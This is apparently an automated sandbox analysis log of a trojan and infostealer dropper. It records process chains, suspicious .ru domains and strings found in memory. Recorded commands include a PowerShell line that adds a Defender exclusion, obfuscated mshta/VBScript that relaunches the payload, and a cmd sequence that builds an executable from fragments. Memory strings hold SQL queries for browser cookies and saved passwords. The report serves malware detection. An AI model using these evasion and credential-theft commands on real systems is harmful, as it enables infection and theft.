                  Source: libstdc++-6.dll.1.drStatic PE information: Section: /4 ZLIB complexity 0.9987349076704546
                  Source: libstdc++-6.dll.1.drStatic PE information: Section: .reloc ZLIB complexity 1.000146484375
                  Source: 14.2.Mon17eac6d534bfd22c7.exe.40a56c8.0.raw.unpack, LocatorAPI.csSuspicious URL: 'http://7hni.kamisime.ru/'
                  Source: 25.2.Mon17948100733a95c58.exe.39d5068.0.raw.unpack, LocatorAPI.csSuspicious URL: 'http://4tfdv6.rafilda.ru/'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@94/64@66/13
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_004035D8 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,ExitProcess,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004035D8
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_00404983 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404983
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeCode function: 0_2_004021A2 CoCreateInstance,0_2_004021A2
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exeCode function: 19_2_00007FF72F5C18F0 FindResourceW,SizeofResource,LoadResource,LockResource,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,SimpleString::operator=,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SleepEx,19_2_00007FF72F5C18F0
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Mon17eac6d534bfd22c7.exe.logJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8076
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7948:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7700
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2740:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4544
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeFile created: C:\Users\user\AppData\Local\Temp\nst1649.tmpJump to behavior
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;Mon17e1fac3fd3d84b.exe&quot;)
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, 00000013.00000002.1994726155.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712308537.00007FF72F6C6000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: SELECT origin_url,action_url,username_element,username_value,password_element,hex(password_value) password_value,submit_element,signon_realm,date_created,blacklisted_by_user,scheme,password_type,times_used,form_data,display_name,icon_url,federation_url,skip_zero_click,generation_upload_status,possible_username_pairs,id,date_last_used,moving_blocked_for FROM logins;
                  Source: setup_installer.exe, 00000001.00000003.1691383572.00000000031C9000.00000004.00001000.00020000.00000000.sdmp, Mon17c604381c7047e.exe, Mon17c604381c7047e.exe, 00000013.00000002.1994877080.00007FF72F703000.00000008.00000001.01000000.00000011.sdmp, Mon17c604381c7047e.exe, 00000013.00000000.1712348839.00007FF72F702000.00000008.00000001.01000000.00000011.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeReversingLabs: Detection: 71%
                  Source: abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeVirustotal: Detection: 68%
                  Source: setup_install.exeString found in binary or memory: -stop
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeFile read: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe "C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exe"
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess created: C:\Users\user\AppData\Local\Temp\setup_installer.exe "C:\Users\user\AppData\Local\Temp\setup_installer.exe"
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe"
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17742f90b916675f2.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17eac6d534bfd22c7.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17c604381c7047e.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17e1fac3fd3d84b.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17b5f403be4d8d6b.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17f45359eb9.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon1785436ae78.exe /mixone
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17948100733a95c58.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe Mon17eac6d534bfd22c7.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon179e1058f256.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon1795d04d4bd.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon178817e243.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe Mon17742f90b916675f2.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe Mon17c604381c7047e.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe Mon17e1fac3fd3d84b.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe Mon178817e243.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe Mon17b5f403be4d8d6b.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe Mon17f45359eb9.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe Mon17948100733a95c58.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe Mon1785436ae78.exe /mixone
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe Mon1795d04d4bd.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe Mon179e1058f256.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 980
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe" ) do taskkill /F -Im "%~NxU"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 12
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\09xU.exE 9xU.EXE -pPtzyIkqLZoCarb5ew
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F -Im "Mon17e1fac3fd3d84b.exe"
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\09xU.exE"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\user\AppData\Local\Temp\09xU.exE" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\user\AppData\Local\Temp\09xU.exE" ) do taskkill /F -Im "%~NxU"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 864
                  Source: C:\Users\user\AppData\Local\Temp\09xU.exEProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " , 0 ,TRuE ) )
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 872
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\control.exe control .\R6f7sE.I
                  Source: C:\Windows\SysWOW64\control.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 900
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8076 -s 1064
                  Source: C:\Users\user\Desktop\abc0f6a2936703cd32608e7a0c06cd7b1da2f012ad7eb.exeProcess created: C:\Users\user\AppData\Local\Temp\setup_installer.exe "C:\Users\user\AppData\Local\Temp\setup_installer.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\setup_installer.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe "C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17742f90b916675f2.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17eac6d534bfd22c7.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17c604381c7047e.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17e1fac3fd3d84b.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17b5f403be4d8d6b.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17f45359eb9.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon1785436ae78.exe /mixoneJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon17948100733a95c58.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon179e1058f256.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon1795d04d4bd.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\setup_install.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c Mon178817e243.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp"Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17742f90b916675f2.exe Mon17742f90b916675f2.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe Mon17eac6d534bfd22c7.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17c604381c7047e.exe Mon17c604381c7047e.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe Mon17e1fac3fd3d84b.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17b5f403be4d8d6b.exe Mon17b5f403be4d8d6b.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17f45359eb9.exe Mon17f45359eb9.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1785436ae78.exe Mon1785436ae78.exe /mixoneJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe Mon17948100733a95c58.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exe C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17eac6d534bfd22c7.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon179e1058f256.exe Mon179e1058f256.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon1795d04d4bd.exe Mon1795d04d4bd.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon178817e243.exe Mon178817e243.exe
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exeProcess created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ( "CMD.exe /c copy /y ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17e1fac3fd3d84b.exe"" ) do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )
                  Source: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exeProcess created: C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe C:\Users\user\AppData\Local\Temp\7zS8BD79F65\Mon17948100733a95c58.exe
